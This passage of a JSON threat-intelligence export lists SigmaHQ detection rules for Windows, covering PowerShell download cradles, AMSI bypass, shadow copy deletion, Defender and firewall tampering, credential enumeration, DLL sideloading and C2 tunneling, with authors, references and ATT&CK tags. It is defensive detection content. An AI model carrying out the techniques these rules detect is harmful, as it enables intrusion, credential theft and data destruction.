"filename": "image_load_office_outlook_outlvba_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_outlook_outlvba_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "value": "Microsoft VBA For Outlook Addin Loaded Via Outlook" }, { "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "image_load_iexplore_dcom_iertutil_dll_hijack.yml", "level": "critical", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f354eba5-623b-450f-b073-0b5b2773b6aa", "value": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load" }, { "description": "Detects a remote DLL load event via \"rundll32.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "image_load_rundll32_remote_share_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/gabe-k/themebleed", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_remote_share_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f40017b3-cb2e-4335-ab5d-3babf679c1de", "value": "Remote DLL Load Via Rundll32.EXE" }, { "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-08-17", "falsepositive": [ "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "filename": "image_load_side_load_antivirus.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "value": "Potential Antivirus Software DLL Sideloading" }, { "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "meta": { "author": "frack113", "creation_date": "2021-07-21", "falsepositive": [ "Unknown" ], "filename": "posh_pc_powercat.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://github.com/besimorhino/powercat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://nmap.org/ncat/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], "tags": [ "attack.command-and-control", "attack.t1095" ] }, "related": [ { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", "value": "Netcat The Powershell Version" }, { "description": "Detects suspicious PowerShell download command", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "PowerShell scripts that download content from the Internet" ], "filename": "posh_pc_susp_download.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "value": "Suspicious PowerShell Download" }, { "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", "meta": { "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "creation_date": "2020-06-29", "falsepositive": [ "Unknown" ], "filename": "posh_pc_xor_commandline.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" }, { "description": "Detects PowerShell called from an executable by the version mismatch method", "meta": { "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_pc_exe_calling_ps.yml", "level": "high", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "value": "PowerShell Called from an Executable Version Mismatch" }, { "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "posh_pc_wsman_com_provider_no_powershell.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "value": "Suspicious Non PowerShell WSMAN COM Provider" }, { "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", "meta": { "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "creation_date": "2017-03-22", "falsepositive": [ "Unknown" ], "filename": "posh_pc_downgrade_attack.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6331d09b-4785-4c13-980f-f96661356249", "value": "PowerShell Downgrade Attack - PowerShell" }, { "description": "Detects remote PowerShell sessions", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-10", "falsepositive": [ "Legitimate use remote PowerShell sessions" ], "filename": "posh_pc_remote_powershell_session.yml", "level": "low", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", "value": "Remote PowerShell Session (PS Classic)" }, { "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "posh_pc_susp_get_nettcpconnection.yml", "level": "low", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", "value": "Use Get-NetTCPConnection" }, { "description": "Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.", "meta": { "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "creation_date": "2022-12-10", "falsepositive": [ "Unknown" ], "filename": "posh_pc_abuse_nslookup_with_dns_records.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1566489367232651264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", "value": "Nslookup PowerShell Download Cradle" }, { "description": "Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.\n", "meta": { "author": "Harish Segar, frack113", "creation_date": "2020-06-29", "falsepositive": [ "Unknown" ], "filename": "posh_pc_renamed_powershell.yml", "level": "low", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "value": "Renamed Powershell Under Powershell Channel" }, { "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "posh_pc_susp_zip_compress.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" ], "tags": [ "attack.collection", "attack.t1074.001" ] }, "related": [ { "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" }, { "description": "Shadow Copies deletion using operating systems utilities via PowerShell", "meta": { "author": "frack113", "creation_date": "2021-06-03", "falsepositive": [ "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], "filename": "posh_pc_delete_volume_shadow_copies.yml", "level": "high", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", "value": "Delete Volume Shadow Copies Via WMI With PowerShell" }, { "description": "Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-06-07", "falsepositive": [ "Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated." ], "filename": "posh_pc_tamper_windows_defender_set_mp.yml", "level": "high", "logsource.category": "ps_classic_provider_start", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "value": "Tamper Windows Defender - PSClassic" }, { "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "posh_pc_remotefxvgpudisablement_abuse.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "value": "Potential RemoteFXvGPUDisablement.EXE Abuse" }, { "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" ], "tags": [ "attack.credential-access", "attack.t1555" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "603c6630-5225-49c1-8047-26c964553e0e", "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" }, { "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_iofilestream.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", "value": "Suspicious IO.FileStream" }, { "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_proxy_scripts.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", "value": "Suspicious TCP Tunnel Via PowerShell Script" }, { "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.execution" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "value": "AMSI Bypass Pattern Assembly GetType" }, { "description": "Detects calls to \"Add-Content\" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-08-18", "falsepositive": [ "Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session" ], "filename": "posh_ps_user_profile_tampering.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.013" ] }, "related": [ { "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "value": "Potential Persistence Via PowerShell User Profile Using Add-Content" }, { "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", "meta": { "author": "frack113", "creation_date": "2022-01-06", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_remote_session_creation.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "value": "PowerShell Remote Session Creation" }, { "description": "Detects keywords that could indicate clearing PowerShell history", "meta": { "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "creation_date": "2022-01-25", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_clear_powershell_history.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", "value": "Clear PowerShell History - PowerShell" }, { "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "meta": { "author": "frack113", "creation_date": "2022-01-02", "falsepositive": [ "Legitimate administration script" ], "filename": "posh_ps_susp_execute_batch_script.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "value": "Powershell Execute Batch Script" }, { "description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"Set-ExecutionPolicy\" cmdlet.", "meta": { "author": "frack113", "creation_date": "2021-10-20", "falsepositive": [ "Administrator script" ], "filename": "posh_ps_set_policies_to_unsecure_level.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4", "https://adsecurity.org/?p=2604", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", "value": "Change PowerShell Policies to an Insecure Level - PowerShell" }, { "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-12", "falsepositive": [ "Unknown" ], "filename": "posh_ps_windows_firewall_profile_disabled.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "http://woshub.com/manage-windows-firewall-powershell/", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "https://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps", "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", "value": "Windows Firewall Profile Disabled" }, { "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate use" ], "filename": "posh_ps_modify_group_policy_settings.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1484.001" ] }, "related": [ { "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", "value": "Modify Group Policy Settings - ScriptBlockLogging" }, { "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", "meta": { "author": "frack113", "creation_date": "2022-01-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_susp_ssl_keyword.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": 